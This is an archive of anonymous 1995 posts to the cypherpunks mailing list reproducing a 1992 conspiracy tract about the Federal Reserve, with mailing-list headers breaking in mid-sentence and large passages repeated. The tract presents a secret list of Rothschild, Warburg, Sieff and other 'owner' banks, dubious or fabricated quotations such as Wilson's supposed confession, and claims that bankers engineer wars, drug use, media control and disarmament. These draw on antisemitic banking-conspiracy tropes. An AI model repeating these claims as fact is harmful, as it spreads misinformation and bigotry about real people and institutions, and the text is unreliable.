   This infamous legislation was accompanied with appropriate fanfare and
propaganda that it would "remove money from politics" and "prevent boom and
bust from hurting our citizens." The people were not told then, and still
do not know today, that the Federal Reserve Corporation is a private MONO-
POLY controlled by bankers, operated for the financial gain of the bankers
at the expense of the people.

   Since that day of infamy a small group of privileged people who lend
us "our money," have accrued to themselves all of the profits of printing
paper currency - and more! Since 1913 they have created trillions of dol-
lars in currency and credit, which as their own personal property, they
then lent to our government and our people, with interest. "The rich get
richer and the poor get poorer" had become the secret policy of our nat-
ional government.

   The main architect of the Federal Reserve System was Paul Moritz War-
burg, who came from a famous German banking family. The kingpin who steer-
ed the Federal Reserve Act through Congress was Senator Nelson Aldrich,
Chairman of the Finance Committee. He was the maternal grandfather of
Nelson A. Rockefeller, of Standard Oil and Chase Manhattan Bank. Aldrich's
daughter, Abby Greene Aldrich, married John D. Rockefeller, Jr. in 1901.
At the time, many people regarded Senator Aldrich as the Rockefeller fam-
ily's mouthpiece in the Senate.

   The Federal Reserve Act was passed during the presidency of Woodrow
Wilson. Just before he died Wilson is reported to have said that he had
been deceived and "I have betrayed my country." He also said:
   "A great industrial nation is controlled by its system of credit. Our
system of credit has been concentrated. The growth of the nation and all
our activities are in the hands of a few men. We have come to be one of
the worst ruled, one of the most completely controlled and dominated gov-
ernments in the world - no longer a government of free opinion, no longer
a government by conviction and vote of the majority, but a government by
the opinion and duress of small groups of dominant men."

                  WHO OWNS THE FEDERAL RESERVE?

   There has been much speculation about who owns the Federal Reserve Cor-
poration. It has been one of the best kept secrets of the century, because
the Federal Reserve Act of 1913 provided that the names of the owner banks
be kept secret. However, R.E. McMaster, publisher of the newsletter THE
REAPER, asked his Swiss banking contacts which banks hold the controlling
stock in the Federal Reserve Corporation. The answer:
1. Rothschild Banks of London and Berlin
2. Lazard Brothers Bank of Paris
3. Israel Moses Sieff Banks of Italy
4. Warburg Bank of Hamburg and Amsterdam
5. Lehman Brothers Bank of New York
6. Kuhn Loeb Bank of New York
7. Chase Manhattan Bank of New York
8. Goldman Sachs Bank of New York.
   In THE SECRETS OF THE FEDERAL RESERVE, Eustace Mullins indicates that,
because the Federal Reserve Bank of New York sets interest rates and con-
trols the daily supply and price of currency throughout the U.S., the
owners of that bank are the real directors of the entire system. Mullins
states:
   "The shareholders of these banks which own the stock of the Federal
Reserve Bank of New York are the people who have controlled our political
and economic destinies since 1914. They are the Rothschilds, Lazard Freres
(Eugene Mayer), Israel Sieff, Kuhn Loeb company, Warburg Company, Lehman
Brothers, Goldman Sachs, the Rockefeller family, and the J.P. Morgan in-
terests."


          THEY PRINT IT - WE BORROW IT AND PAY THEM INTEREST

   An example of the process of currency creation and its conversion
into "people's debt" will aid our understanding. The Federal Government,
having spent more than it has taken from its citizens in taxes, needs
(for the sake of illustration) $1 billion. Since it does not have the
currency, and Congress has given away its authority to create it, the
government must go to the creators for the $1 billion. But the Federal
Reserve, a private corporation, does not give its currency away for free!
The bankers are willing to deliver $1 billion in currency or credit to
the federal government in exchange for the government's agreement to pay
it back with interest. So Congress authorizes the Treasury Department to
print $1 billion in U.S. Bonds, which are then delivered to the Federal
Reserve bankers. (The bonds are a kind of "IOU" that bears interest.)

   The U.S. Treasury prints $1 billion in bank notes. The printing cost is
about $20.62 per 1,000 bills - it costs the same irrespective of the de-
nomination - the cost of printing a $1 note is about the same as for a
$100 note: about .0206 cents. The Federal Reserve "buys" these bills from
the U.S. Treasury, paying only for the printing costs. The bills are then
exchanged at full face value for the bonds. The government uses the curr-
ency to pay its obligations. What are the results of this fantastic trans-
action? Well, the government's bills are paid all right, but the U.S. Gov-
ernment has now indebted the people to the Federal Reserve bankers for $1
billion plus interest!

   Since this process has been going on since 1913, the people are now
indebted to the bankers to the tune of trillions of dollars. The people
are taxed billions of dollars each month just to pay the interest on this
"national debt." With both the principal and the interest climbing every
month, there is no hope of ever paying off this "debt." The working people
of the United States now "owe" the approximately 300 banking families and
their consorts more than the assessed value of all the assets in the
United States. And realize, the bankers got all this for the cost of
paper, ink, and bookkeeping!

                      THE MOUNTAIN OF DEBT

   You say this is terrible! Yes it is, but this is only part of the
sordid story. Under this "debt-currency" system, those U.S. Bonds referred
to above have now become assets of the banks, called their "reserve."
Regular commercial banks use these assets to issue loans to individual and
commercial customers. Since the banking laws require only about a 12%
reserve, this means the banking fraternity can lend up to eight times the
amount of the bonds they have on hand. As a result of the $1 billion
discussed here, they can lend $8 billion to private customers at inter-
est. This means that together with the $1 billion lent to the government,
the bankers can lend out $9 billion at interest for the original cost to
them of about $400,000 for the printing! And because the Federal Reserve
bankers have been granted a MONOPOLY, the only way our people and bus-
inesses can get currency to carry on trade and expand industry and farm-
ing is to borrow it from the bankers!

                 USING DEBT TO EXPAND CONTROL

   In addition to the vast wealth drawn to them through this almost un-
limited usury, the bankers who control the currency are able to approve
or disapprove large loans to big and successful corporations. Bankers can
refuse a loan, thereby depressing the price of a corporation's shares on
the stock exchange. This enables the bankers' agents to buy large blocks
of the shares at depressed prices. Then they can approve a multi-million
dollar loan to the corporation, resulting in its share price rising,
allowing the bankers' agents to sell the shares, sometimes making huge
profits. In this manner billions of dollars are made to buy even more
shares.

   Using this method since 1913, the bankers and their agents have pur-
chased secret or open control of almost every large corporation in Amer-
ica. Using that control, they force the corporations to borrow huge sums
from their banks so that corporate earnings are partially siphoned off in
the form of interest paid to the banks. This leaves little "actual profit"
to be paid out as dividends.

   When bankers lend more, the currency supply expands. When they rein
in the loans, the currency supply contracts. By expanding or contracting
the currency supply, the bankers can make the stock market go up or down
at their pockets' content! They can cause "busts and booms" almost as
they wish.

   That is why President James A. Garfield said, "Whoever controls the
volume of money in any country is absolute master of all industry and
commerce."

   At the time of writing (July, 1992), the New York stock market has
been hovering around record highs for months, while the economy continues
to suffer a protracted slump. The bankers no doubt want the stock mar-
ket to be high and the economy to recover before the coming presidential
election. Keep in mind that they endorse all three presidential candi-
dates. Tweedledum and Tweedledee; or Louie, Huey, and Dewey; or Larry, Mo,
and Curly - they are all in the hands of the bankers.

             WHY LOANS EVENTUALLY SHRINK THE CURRENCY SUPPLY

  The only way new currency goes into circulation in America under this
wicked system is when someone borrows it from a banker. When people are
confident of success, they borrow more currency, which increases the
currency supply, and all seem to prosper for a while. Then, as they pay
off their loans, the available currency supply shrinks and currency be-
comes "scarce." Borrowers must always take more currency out of circu-
lation when they repay their loans, than they put in circulation when
they receive their loans. Interest and charges make the repayment total
larger than the loan. This means that only more people borrowing still
more can keep the medium of exchange available to the nation.

   This example may aid understanding. When a citizen goes to a banker
to borrow $100,000 to purchase a home or a farm, and the loan is granted,
the banker gives the borrower a check for $100,000 or credits the borrow-
er's account with $100,000. The borrower, in turn, writes the necessary
checks to the builder, seller, subcontractors, etc. (who, in turn, write
more checks), thereby putting $100,000 of "checkbook currency" into cir-
culation. However, on a 30-year mortgage with 10% interest, the banker
wants $828 per month, or a total of $316,080. The buyer must take that
$316,080 out of circulation, reducing the overall amount in circulation
by $216,080.

   The banker has not really produced anything of value, except the slip
of paper called a check or deposit slip. Yet the banker ends up having
$216,080 more than he had before, minus a few hundred dollars of clerical
and office costs. But the people, as a whole, have $216,080 less.

                 WHY SMALL LOANS HAVE THE SAME EFFECT

   For those who haven't quite grasped the impact, let us consider an
auto loan for only three years. Step one: citizen borrows $6,000 and pays
it into circulation (to the dealer, factory, etc.). Citizen agrees to re-
pay the banker $7,200. Step two: Citizen pays $200 per month. In 36 months
citizen has taken $7,200 out of circulation and paid it to the bank. Net
result? $1,200 less currency in circulation.

   Since currency requirements increase with expanding population, in-
dustry, and commerce, and paying off any loan decreases the available
currency supply, it is clear that we would quickly run out of currency,
unless more and more people borrow more and more currency to keep curr-
ency in circulation!

   Multiply the above examples by hundreds of millions of times since
1913, and you can see why America has fallen from a prosperous debt-free
nation to the most debt-ridden country in the world. Practically every
home, farm, and business is heavily mortgaged to the bankers. Practically
all our cars, furniture, and clothes are purchased with borrowed currency.
The interest to the bankers on personal, state, and federal debt totals
more than 25% of the combined earnings of the working population!

             THE COST TO THE BANKERS? PRACTICALLY NOTHING

   In the tens of millions of transactions made each year like those
shown here, relatively few bank notes change hands, nor is it necessary







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:38 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280611.HAA02220@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


that they do. 95% of all "cash" transactions in the U.S. are by check.
Checks are thus effectively also currency. The banker creates the so-
called "loan" by writing a check or deposit slip, not against actual
money, but against your promise to pay back the loan. The only cost to the
bank is the paper, ink, and a few dollars in salaries and office costs for
each transaction. It is "check-kiting" on an enormous scale! The profits
are enormous as shown below.

                 THE COST TO YOU? PRACTICALLY EVERYTHING

   In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen.
State and local debts were practically non-existent, and government was
small and not oppressive.

   By 1920, after only six years of the Federal Reserve handling our
currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its ear-
ly stages.

   By 1968 the federal debt had jumped to $347 billion - $1,717 per cit-
izen. Ten years later, by 1978 it had doubled again to $763 billion
- $3,500 per citizen. That is a debt of $17,500 for every family of five
in America. Federal debt has been growing faster and faster since. And
the Federal Government has become a debilitating cancer rapidly sapping
and weakening its victim.

   Today in 1992 the federal debt is over $4 trillion. (And they "cook the
books" on the low side to come up with that figure - see Chapter Nine.)
The $4 trillion national debt amounts to $16,000 per citizen, or $80,000
per family of five. And if that debt were calculated in terms of working
or tax-paying families, it would be considerably higher. The Federal Gov-
ernment has become a bloated, out-of-control parasite, a terminal cancer.
The economy seems so weak that even after many months of blowing up the
currency supply, signs of recovery have to be searched for. The entire
system may be on the brink of complete collapse.

   The above figures do not include state, municipal, school district,
business, or personal debts, which total an additional $3 trillion. Total
debt in America is thus over $7 trillion - $28,000 per citizen - $120,000
per family of five. This is more than twice the assessed value of all the
land and buildings in America. Effectively all of America has been signed
over to the bankers. They can take America and we would still owe them
another America! Of course, it is to their advantage not to take actual
title to the property, so we will not realize that we really own nothing.
Instead they leave us with "ownership" so we will willingly continue to
work and pay ever higher tributes to the bankers.

   What we really have is national bankruptcy. Let me repeat the words of
Senator John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this won-
derful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy.... We
have defrauded our country to get ourselves elected."

         THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

   To grasp the fact that periodic withdrawal of currency through interest
payments to the bankers will inexorably transfer all wealth in the nation
to the receivers of interest, imagine yourself in a poker or dice game.
Everyone has to buy chips (the medium of exchange) from a "banker" who
does not risk chips in the game, but watches the table and every hour rea-
ches in and takes 10% to 15% of all the chips on the table. As the game
progresses, the number of chips in the possession of each player will go
up and down with his or her "luck." However, the total number of chips
available to play the game (carry on business and trade) will decrease
steadily, while the "banker's" mountain of chips just grows and grows.

   The game will get low on chips, and some players will run out. If they
want to continue to play, they must buy or borrow more chips from the
"banker." The "banker" will sell (lend) the player more chips only if the
player signs a "mortgage" agreeing to give the "banker" some real pro-
perty (car, home, farm, business, etc.). If the payments should go into
default, the banker takes the property. The payments must be made on time,
whether the player wins (makes a profit) or not.

   It is easy to see that no matter how skillfully the players play,
eventually the "banker" will end up with all of his chips back. Except
for the very best or "luckiest" players, the rest, if they stay in the
game long enough, will end up owing to the "banker" their cars, their
homes, their farms, their businesses, and perhaps even their watches,
rings, and the shirts off their backs!

   Sir Josiah Stamp, President of the Bank of England in the 1920s, and
the second richest man in Britain at the time, said:
   "Banking was conceived in iniquity and was born in sin. The bankers
own the earth. Take it away from them but leave them in power to create
deposits, and with the flick of the pen they create enough deposits to
buy it back again. However, take it away from them, and all the great
fortunes like mine will disappear, and they ought to disappear, for this
would be a happier and better world to live in. But, if you wish to re-
main the slaves of bankers and pay the cost of your own slavery, let
them continue to create deposits."

   Our real-life situation is much worse than any poker game. In a poker
game no one is forced to go into debt, and anyone can quit at any time
and keep whatever he or she still has. But in real life, even if we borrow
little ourselves from the bankers, the local, state, and federal govern-
ments borrow billions in our name, squander it, then confiscate our earn-
ings from us and pay it to the bankers with interest. We are forced to
play their game, and it seems we can only leave the game by dying. We
pay as long as we live, and our children pay after we die. If we cannot
pay, the same government sends the police to take our property and give
it to the bankers. The bankers risk nothing (at least, the Federal
Reserve bankers) in the game; they just collect their percentage and "win
it all." In Las Vegas all the games are "rigged" to pay the house (owner)
a percentage. They rake in millions. The Federal Reserve bankers' "game"
is similarly rigged, and it pays off in billions.

   In recent years bankers have added more "cards" to their game.
"Credit" cards are promoted as a convenience and a great boon to trade.
Actually, they are ingenious devices by which bankers collect 2% to 5%
of every retail sale from the seller and 18% or more interest from buy-
ers. A real stacked deck!

              POLITICIANS AND BANKERS IN THE SAME LEAGUE

   Democrat, Republican, and Independent voters have wondered why poli-
ticians always spend more tax currency than they collect. The reason
should now be clear. When you study our "debt-currency" system, you soon
realize that the politicians are not the agents of the people. They are
the agents of the Federal Reserve Bankers, for whom they plan ways to
place the people further in debt. Let me again quote the words of Senator
John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this wonder-
ful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy....
We have defrauded our country to get ourselves elected."

   Article 1, Section 8 of the U.S. Constitution states, "The Congress
shall have power... to coin money, regulate the value thereof..." But what
have our politicians done? In 1913 they traitorously gave the U.S. Treasury
to the Federal Reserve bankers - lock, stock, and barrel! Someone recently
asked, "What's the difference between Kindergarten and Congress?" Answer:
"One has adult supervision!" Actually, we shouldn't criticize Congress,
after all, we have the best Congress money can buy. Chapter Ten examines
Congress in more detail.

                    FEDERAL RESERVE SYSTEM AUDIT

   The Federal Reserve has never been audited by the government. In 1975
a bill, H.R. 4316, to require Federal Reserve audits, was introduced in
Congress. Due to pressure from the currency-controllers, it was rejected.
No audit of the Federal Reserve has ever been done.

                       MOUNTING DEBTS AND WARS

   We, as a people, are now ruled by a "banker-owned system" that has
usurped the mantle of government, disguised itself as our legitimate
government, and set about to pauperize and control the people. It is now
a centralized, all-powerful apparatus whose main purposes are spending the
people's currency, promoting war, and propagandizing to perpetuate itself
in power. Our two large political parties (the "Demopublicans" also call-
ed "Republicrats") have become its servants, the various departments of
government its spending agencies, and the Internal Revenue Service its
collection agency.

   Unknown to the people, our "banker-owned system" operates in close
cooperation with similar apparatuses in other nations, also disguised as
"governments." Some, we are told, are friends. Others, we are told, are
enemies. "Enemies" are built up through international manipulations and
used to frighten the American people into going billions of dollars more
into debt to the bankers for "military preparedness," "foreign aid to
stop communism," "minority rights," etc. Citizens, deliberately confused
by brainwashing propaganda, watch helplessly while our politicians give
our food, goods, and gold to banker-controlled alien governments under the
guise of "better relations," "easing tensions," or "humanitarian aid."
Our banker-controlled government takes our finest and bravest sons and
sends them into foreign wars, where tens of thousands are murdered and
hundreds of thousands are crippled. Other thousands are morally corrupted
and addicted to drugs. When the "war" is over we have gained nothing, but
we are scores of billions more in debt to the bankers - which was the real
reason for the war in the first place!

                   MORE THAN JUST ECONOMIC RAPE

   The profits from these massive debts have been used to erect a com-
plete and almost hidden economic and political colossus over our nation.
Our "banker-owned system" keeps telling us they are trying to do us good,
when in truth they work to harm and injure the people. These would-be
despots know it is easier to control and rob an ignorant, poorly-educated,
and confused people than it is an informed population, so they deliber-
ately degrade our educational systems. For the same reason they secretly
favor drug use, alcohol, racial conflict, and crime in general. Their "war
on drugs," as an example, only produces more drug use and a host of relat-
ed crimes. Everything which debilitates the minds and bodies of the people
is secretly encouraged, as it makes the people less able to oppose them,
or even to understand what is being done to them. The system wants medio-
cre, unthinking, helpless "sheople."

   Family, morals, and all that is honorable is being swept away, while
our "banker-owned system" builds their new subservient man, the found-
ation of their "new world order." Our new rulers are trying to change our
whole political, social, and racial order, but they will not change the
debt-currency economic system by which they rob and rule. Our people have
become tenants and "debt-slaves" to the bankers and their agents in the
land our fathers conquered. It is conquest through the most gigantic
fraud and swindle in the history of humankind. And we remind you again:
The key to their wealth and power over us is their MONOPOLISTIC ability
to "create" currency out of nothing and to lend it to us at interest. If
Congress had not allowed them to do that, they never would have gained
secret control over our nation.

                   CONTROLLED NEWS AND INFORMATION

   This currency-lender conspiracy ("consPIRACY") is as old as Babylon.
Even in America it dates far back before 1913. Actually, 1913 was the
year in which the way opened for complete economic conquest of our peo-
ple. The conspiracy is old enough to America so that the system's agents
have been for many years in positions such as newspaper publishers,
editors, columnists, church ministers, university presidents, professors,
textbook authors, attorneys, accountants, labor union leaders, movie mak-
ers, radio and TV commentators, politicians from school board members to
U.S. Presidents, and many others.

   These agents control the information available to our people. They
manipulate public opinion, elect who they will locally and nationally,
and never expose the crooked currency system. They promote school bonds,
municipal bonds, expensive and detrimental farm programs, "urban renew-
al," "foreign aid," and many other schemes which will put the people more
in debt to the bankers. Thoughtful citizens wonder why billions are spent
on one program and billions on another which may duplicate or even null-
ify it, such as paying some farmers not to raise crops, while at the same
time building dams or canals to irrigate more farm land. Crazy or stupid?
Neither. The goal is more debt. Thousands of government-sponsored ways to
waste "money" are perpetrated continually. Most make no sense, but they
are never exposed for what they really are: builders of billions for the
bankers and debts for the people.

   So-called "economic experts" write syndicated columns in hundreds of
newspapers, craftily designed to prevent the people from learning the
simple truth about our debt-currency system. Commentators on radio and
TV, educators, and politicians blame the people as wasteful, lazy, or
spendthrift, and blame the workers and consumers for the increase in
debts and the inflation of prices, when they really know that the basic
cause is the debt-currency system itself. Our people are drowned in char-
ges and counter-charges designed to confuse them and keep them from under-
standing the evil currency system that so silently robs the workers, farm-
ers, and business people of the fruit of their labor. And, increasingly,
the system is being used to rob us of our rights and freedoms, supposedly
guaranteed by the U.S. Constitution.

   In his book INVENTING REALITY,  Michael Parenti wrote:
   "Ten business and financial corporations control the three major tele-
vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat-
ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59
magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON
POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub-
lishers and various motion picture companies like Columbia Pictures and
Twentieth Century Fox. Three quarters of the major stockholders of ABC,
CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust,
Citibank, and Bank of America.
   The overall pattern is one of increasing concentration of ownership
and earnings. According to a 1982 LOS ANGELES TIMES survey, independent
daily newspapers are being gobbled up by the chains at the rate of fifty
or sixty a year. Ten newspaper chains earn over half of all newspaper rev-
enue in this country. Five media conglomerates share 95 percent of the
record and tapes market with Warner and CBS alone controlling 65 percent
of the market. Eight Hollywood studios account for 89 percent of U.S.
feature film rentals. Three television networks earn over two-thirds of
total U.S. television revenues. Seven paperback publishers dominate the
mass market for books...
   While having an abundance of numbers and giving an appearance of di-
versity, the mass media actually are highly centralized outlets that
proffer a remarkably homogenized fare. News services for dailies through-
out the entire nation are provided by the Associated Press and United
Press International (which may soon merge with AP or go under), The New
York Times-Washington Post wire services, and several foreign wire ser-
vices like Reuters. The ideological viewpoint of these news conduits are
pretty much the same, marked by prefabricated standardization of news
which is constricting and frightening."

   In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:
"The power to control information is a major lever in the control of
society. Giving citizens a choice in ideas and information is as impor-
tant as giving them a choice in politics. If a nation has narrowly con-
trolled information it will soon have narrowly controlled politics."

   When a few informed and concerned people or organizations who know the
truth begin to expose the bankers and their agents, or try to stop any of
their mad schemes, the messengers are ridiculed and smeared as "right-
wing extremists," "super-patriots," "bigots," "racists," "fascists," or
"antisemites." Any name is used to discredit them, and to stop other peo-
ple from listening. Books and articles such as you are now reading are
kept out of schools, libraries, and book stores.

   Some, who are especially vocal in their exposure of the treason com-
mitted against our people, are harassed by government agencies such as
the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank-
ruptcy. Sometimes their businesses and homes are violently raided at gun-
point, and their money, currency, equipment, and records confiscated, so
it is very difficult, if at all possible, to continue their business. In
Chapter One the National Commodity and Barter Association was mentioned as
an example of such raids. But the most striking case has been that of Ezra
Pound, which is covered below.

   Using these methods, the Federal Reserve bankers and their agents have
been completely successful in preventing most Americans from learning the
things you are reading in this report. However, in spite of their control
of information, they realize that more and more citizens are learning the
truth. Therefore, to prevent retaliation and armed resistance to their
plunder of America, they plan to register all firearms and eventually
disarm all citizens. They want to eliminate all guns not in the hands of
their government police or army. Our wise Founding Fathers wrote the Se-
cond Amendment to the Constitution so that the people could protect them-
selves against the government.

   Love of life, interest in your freedom, compassion for humanity, con-
cern for your children, and the safety of all you have worked for should
make you deeply interested in this, America's greatest problem. Our gener-
ation has not suffered under the bankers' yoke as the coming generations
will. Usury and taxes will continue to take a larger and larger part of
the earnings of the people and put them deeper into the pockets of the
bankers and their agents. Increasing "government" regulations will prevent citizen
protest and opposition to their control. Is it possible that your grand-
children will own neither car nor home, but will live in "government-
owned" apartments and ride to work in "government-owned" buses, and be
allowed to keep just enough of their earnings to buy a minimum of food and
clothing, while their rulers wallow in luxury? In Asia and Eastern Europe
this used to be called communism. In America it is called democracy or
capitalism.

   Horace Greeley stated, "While boasting of our noble deeds, we are
careful to conceal the ugly fact that by an iniquitous currency system
we have nationalized a system of oppression which, though more refined, is
no less cruel than the old system of chattel slavery."

                     THE CASE OF EZRA POUND

   Ezra Pound was a poet, one of America's greatest - if not the great-
est. He played a major role in the development of writers and poets, such
as E.E. Cummings, T.S. Eliot, Robert Frost, Ernest Hemingway, James Joyce,
and William Carlos Williams. He also studied politics, economics, banking,
and monetary theory. He disapproved of war. During World War II, he hid a
number of Jews from the Nazi exterminators; if discovered the penalty
would have been death. He broadcast a series of talks on Italian radio
aimed at Americans. He had wanted America to stay out of the war, and he
said some uncomplimentary things about President Franklin D. Roosevelt. He
also stated some of his political and monetary ideas. He was accused of
being a traitor. At the end of the war he was imprisoned in an American
concentration camp near Pisa, Italy for six months without trial. Then he
was transferred to America where he was declared insane and imprisoned in
a mental hospital in Washington D.C. for thirteen years, after which the
treason charges, for which he had never stood trial, were dropped, and he
was released. He returned to Italy, where he lived until his death in
1972.

   The reason he was not tried seems to be that his prosecutors didn't
have a case that would hold up in court and/or they were afraid that he
would repeat in court what he had said over the radio in Italy. Wendell
Muncie, M.D., one of the psychiatrists involved in his "sanity hearing,"
said that Pound's insanity consisted of three factors: his passion for the
U.S. Constitution, his espousal of the Confucian ethic, and his desire for
world peace. No formal diagnosis of Pound's supposed "insanity" has been
found. His captors in Washington openly admitted that Pound was a polit-
ical prisoner. A Congressional investigation started in 1957 and completed
in 1958 exposed the inadequacy of the case against Pound and led to his
release.
   Here are some extracts from Pound's radio talks:
."I think an alliance with Stalin's Russia is rotten." (January 29, 1942)
."Liberty is not a right but a duty." (March 8, 1942)
."Sovereignty inheres in the right to issue money. And the American sov-
ereignty belongs by right to the people, and their representatives in
Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on
the observation of this quite decided law.... Now the point at which em-
bezzlement of the nation's funds on the part of her officers becomes trea-
son can probably be decided only by jurists, and not by hand-picked judges
who support illegality." (April 9, 1942)
.Quotes read by Pound: 1. "'I believe that banking institutions are more
dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the
financial institutions in the rear. Of the two, the one in the rear is the
greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires
against it in times of adversity. It is more despotic than monarchy, more
insolent than autocracy, more selfish than bureaucracy; it denounces as
public enemies all who question its methods, or throw light upon its
crimes.' - William Jennings Bryan." (July 26, 1942)
.Back to Pound's own words: "Wars in old times were made to get slaves.
The modern implement of imposing slavery is debt." (March 25, 1943)
."The phase of the usury system which we are trying to analyze is more or
less Patterson's perception that the Bank of England could have benefit
of all the interest on all the money that it creates out of nothing....
Now the American citizen can, of course, appeal to his constitution, which
states that Congress shall have power to coin money or regulate the value
thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30,
1943)
."That text is known to them that have the patience to read it, possibly
one-hundredth of one percent of the denizens. They forget it, all save
a few Western states. I think somebody in Dakota once read it. The Consti-
tution." (June 30, 1943)

       THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONAL AND ILLEGAL

   Although there has never been a court case that challenged the legal-
ity of the Federal Reserve System, there was a challenge to the National
Recovery Act or NRA, which was ruled unconstitutional. The U.S. Supreme
Court - Schechter Poultry v. U.S., 29 U.S. 495, 55 U.S. 837.842 (1935) -
ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI-
MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states,
"The Congress shall have power... to coin money, regulate the value there-
of..." By passing the Federal Reserve Act, Congress abdicated and trans-
ferred to the Federal Reserve bankers its constitutionally legitimate
function of issuing and controlling money. If the Supreme Court ruling on
the NRA is applied to the Federal Reserve System, the unconstitutionality
and illegality of the Fed becomes obvious.

                        TELL THE PEOPLE

   America will not shake off her illegal banker-controlled dictatorship
as long as the people are ignorant of the hidden controllers. Interna-
tional bankers, who control most of the governments of the nations and
most sources of information, seem to have us completely in their grasp.
They are afraid of only one thing: an awakened citizenry armed with the
truth. An ignorant citizen is the banker-government's best "client." An
informed citizen is the banker-government's worst nightmare.

   Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At-
lanta Georgia, said:
   "This is a staggering thought. We are completely dependent on the com-
mercial banks. Someone has to borrow every dollar we have in circulation,
cash, or credit. If the banks create ample synthetic money, we are pros-
perous; if not, we starve. We are absolutely without a permanent money
system. When one gets a complete grasp of the picture, the tragic absur-
dity of our hopeless position is almost incredible, but there it is. It
is the most important subject intelligent persons can investigate and re-
flect upon. It is so important that our present civilization may collapse
unless it becomes widely understood and the defect remedied very soon."

                        PRIVATE BANKING

   In California a very private "non-bank" has been operating successfully
for fifteen years. It caters for accounts in gold or Federal Reserve
Notes. It is completely private and doesn't report to anyone. It pays in-
terest on both gold and Federal Reserve Note balances. Ideally, we need to
establish a network of private banks throughout the country, and even-
tually throughout the rest of the world. See Chapter Twelve.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:14:18 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280613.HAA02274@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


that they do. 95% of all "cash" transactions in the U.S. are by check.
Checks are thus effectively also currency. The banker creates the so-
called "loan" by writing a check or deposit slip, not against actual
money, but against your promise to pay back the loan. The only cost to the
bank is the paper, ink, and a few dollars in salaries and office costs for
each transaction. It is "check-kiting" on an enormous scale! The profits
are enormous as shown below.

                 THE COST TO YOU? PRACTICALLY EVERYTHING

   In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen.
State and local debts were practically non-existent, and government was
small and not oppressive.

   By 1920, after only six years of the Federal Reserve handling our
currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its ear-
ly stages.

   By 1968 the federal debt had jumped to $347 billion - $1,717 per cit-
izen. Ten years later, by 1978 it had doubled again to $763 billion
- $3,500 per citizen. That is a debt of $17,500 for every family of five
in America. Federal debt has been growing faster and faster since. And
the Federal Government has become a debilitating cancer rapidly sapping
and weakening its victim.

   Today in 1992 the federal debt is over $4 trillion. (And they "cook the
books" on the low side to come up with that figure - see Chapter Nine.)
The $4 trillion national debt amounts to $16,000 per citizen, or $80,000
per family of five. And if that debt were calculated in terms of working
or tax-paying families, it would be considerably higher. The Federal Gov-
ernment has become a bloated, out-of-control parasite, a terminal cancer.
The economy seems so weak that even after many months of blowing up the
currency supply, signs of recovery have to be searched for. The entire
system may be on the brink of complete collapse.

   The above figures do not include state, municipal, school district,
business, or personal debts, which total an additional $3 trillion. Total
debt in America is thus over $7 trillion - $28,000 per citizen - $120,000
per family of five. This is more than twice the assessed value of all the
land and buildings in America. Effectively all of America has been signed
over to the bankers. They can take America and we would still owe them
another America! Of course, it is to their advantage not to take actual
title to the property, so we will not realize that we really own nothing.
Instead they leave us with "ownership" so we will willingly continue to
work and pay ever higher tributes to the bankers.

   What we really have is national bankruptcy. Let me repeat the words of
Senator John Danforth:
   "I have never seen more senators express discontent with their jobs..
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this won-
derful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy.... We
have defrauded our country to get ourselves elected."

         THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

   To grasp the fact that periodic withdrawal of currency through interest
payments to the bankers will inexorably transfer all wealth in the nation
to the receivers of interest, imagine yourself in a poker or dice game.
Everyone has to buy chips (the medium of exchange) from a "banker" who
does not risk chips in the game, but watches the table and every hour rea-
ches in and takes 10% to 15% of all the chips on the table. As the game
progresses, the number of chips in the possession of each player will go
up and down with his or her "luck." However, the total number of chips
available to play the game (carry on business and trade) will decrease
steadily, while the "banker's" mountain of chips just grows and grows.

   The game will get low on chips, and some players will run out. If they
want to continue to play, they must buy or borrow more chips from the
"banker." The "banker" will sell (lend) the player more chips only if the
player signs a "mortgage" agreeing to give the "banker" some real pro-
perty (car, home, farm, business, etc.). If the payments should go into
default, the banker takes the property. The payments must be made on time,
whether the player wins (makes a profit) or not.

   It is easy to see that no matter how skillfully the players play,
eventually the "banker" will end up with all of his chips back. Except
for the very best or "luckiest" players, the rest, if they stay in the
game long enough, will end up owing to the "banker" their cars, their
